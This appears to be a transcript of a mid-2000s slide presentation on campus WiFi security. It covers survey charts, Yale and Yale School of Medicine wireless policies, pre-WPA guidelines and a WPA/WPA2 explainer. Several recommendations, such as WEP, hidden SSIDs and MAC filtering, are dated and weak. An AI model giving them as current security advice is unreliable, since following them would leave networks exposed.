[Chart: 802.1X Authentication Protocols Implemented (Yes / No): EAP-MD5, LEAP (Cisco), PEAP, EAP-TLS, TTLS; counts not recoverable from the transcript]
[Chart: Commercial Secure WiFi Vendor Implementations (Implemented / Evaluating): BlueSocket, Perfigo (Eval), None; counts as extracted: 1, 13, 1]
[Chart: WLAN / Campus Network Topology Independence (Yes / No): WLAN VLAN, Private IP, Non-campus, Campus Public; counts as extracted: 12, 3, 5, 10, 6, 9, 9, 6]
[Chart: Net Sec Access Control -- Firewall between WLAN & Campus Net / Internet (Yes / No / Not Yet); counts as extracted: 4, 11, 0, 8, 6, 1]
[Chart: VPN Session Required from WLAN to connect to: Outside of WLAN / Campus Net (Yes / No / Not Yet); counts as extracted: 2, 12, 1, 3, 12, 0]
[Chart: WLAN Data Link Layer Security Protections (Yes / No / Not Yet): MAC ACLs, Anti Spoof, Private SSID, No ID Bcast; counts as extracted: 6, 9, 0, 2, 13, 0, 3, 12, 0, 5, 9, 1]
[Chart: WLAN Security CounterMeasures (Yes / No): Force WAP Associations, Jamming Capability; counts as extracted: 5, 10, 0, 15]
[Chart: WLAN Authentication 1 (Yes / No / Not Yet): Allow Unauth, NetReg DHCP, Web Logon, 802.1X Logon; counts as extracted: 1, 14, 0, 8, 7, 0, 6, 9, 0, 6, 8, 1]
[Chart: WLAN Authentication 2 (Yes): X.509 Certs, SmartCard, VPN Auth; counts as extracted: 1, 0, 2]
[Chart: WEP/WPA Encryption (Yes / No / Not Yet): WEP 40 Static, WEP > 64 Static, WEP 40 Dynamic, WEP > 64 Dynamic, WPA 128 Static, WPA 128 & 802.1X; counts not recoverable from the transcript]
[Chart: Encryption Requirement by WLAN Protocol Layer (Don't Care / Recommend / Require): Application, Session, Transport, Network, Data Link; counts as extracted: 5, 6, 2, 4, 6, 3, 5, 2, 5, 5, 2, 5, 5, 2, 5]
[Chart: WLAN Policies 1 (Yes / No / N/A): RF Airspace Reserved, Require Non-IT WAP Stds; counts as extracted: 8, 7, 0, 6, 7, 2]
[Chart: WLAN Policies 2 - Allow WLANs outside IT? (Yes / No): Non-IT Dept WAPs, Faculty WAPs, Student WAPs; counts as extracted: 5, 10, 4, 11, 3, 12]
Interesting or Unique Practices and Findings
Not all devices support > 64 bit WEP so 40 bit must often be used.
A few campuses are moving from Cisco LEAP to PEAP or EAP-TLS.
Rutgers is using BlueSocket: http://ruwireless.rutgers.edu/
Dartmouth has widespread WiFi and VoIP over WiFi.
Several campuses use NoCat for both wired and wireless authentication (and thereby enable access).
More Interesting/Unique Practices and Findings
Companies are marketing for-pay public WiFi access points which you can hang off of any high speed Internet connection. These boxes allow users passing by to associate and pay for access by credit card. Look for students to try to make $$$?
Other Interesting/Unique Practices and Findings?
Yale University Unwritten Wireless Policy
Do no harm: Private Wireless Access Points which cause network disruption at Yale will be removed from the network (this includes causing interference by overlapping RF channels, etc). Use of WEP or WPA is encouraged.
Private Access Points should not use the Yale SSID.
WiFi users are encouraged to use the VPN to access critical apps or sensitive information.
Yale Administrative users should not use WiFi to replace wired LAN connections.
The above admin apps should already, however, be using application level security on wired networks.
Yale School of Medicine Wireless Policy Points
All private WAPs need to be registered.
The default SSID must be changed to something other than Yale’s and the default passwords must be changed.
The WAP must only allow WEP and should implement MAC address filtering.
It should be turned off if/when not used.
Yale School of Medicine Wireless Policy Points
Official YSM WiFi Security:
ePHI should not be transferred unencrypted.
YSM ITS WLANs are changing from VPN (either PPTP or IPSEC) recommended to required.
DHCP will vend an RFC1918 private IP to the YSM WLAN. Users must authenticate to the VPN and use it to connect to any resources outside of the WLAN.
Clients w/o registered MAC addresses or valid VPN sessions attempting HTTP connections to addresses outside the WLAN VLAN are redirected to a web portal where documentation and software are available (but little else).
WiFi Security Pre-WPA/802.11i Guidelines for Enterprise IT
Disable SSID broadcasts & use a non-obvious SSID.
Use WEP.
Use a separate VLAN & private IP net for the WLAN.
Firewall the WLAN off from the corporate intranet.
Require the use of a VPN to enter the corporate intranet.
Use MAC Address filtering -- block non-registered devices.
Force client association -- to a known SSID.
Monitor airspace -- war-walk/chalk/drive/run AND look into WiFi perimeter protection products and systems.
Use 802.1X Layer 2 Authentication with EAP & RADIUS.
What WPA and 802.11i Provide:
Strong integrity.
Strong encryption
• Particularly AES vs. the WEP encryption implementation
• Dynamic key generation/re-generation
Strong authentication capability (w/802.1X/EAP).
Increased DoS (Denial of Service) protection - particularly against dis-association attacks.
What is WPA2?
WPA2 == 802.11i
WPA2 & 802.11i include AES.
WPA2 is basically (WPA + AES).
WPA does not include AES; it uses TKIP (a stopgap built on RC4 so that it runs on WEP-era hardware). WPA IS secure.
AES is a FIPS-approved algorithm (FIPS 197), as required for FIPS 140-2 validated products by some Gov’t agencies.
AES can require new hardware or hardware upgrades as it can require a new dedicated crypto chip.
Several WiFi vendors are now ‘WPA2’ compliant.
Conclusions
Few using WEP, some are now starting to evaluate WPA (and wait for 802.11i).
Some use of commercial solutions (Vernier, Aruba, some ReefEdge and BlueSocket)?
Some interest is beginning in ‘network admissions’ programs (require both authentication and a network scan à la UCONN NetReg mods) for both wired and wireless LANs: Cisco, Perfigo, StillSecure and Bradford Campus Manager.
Questions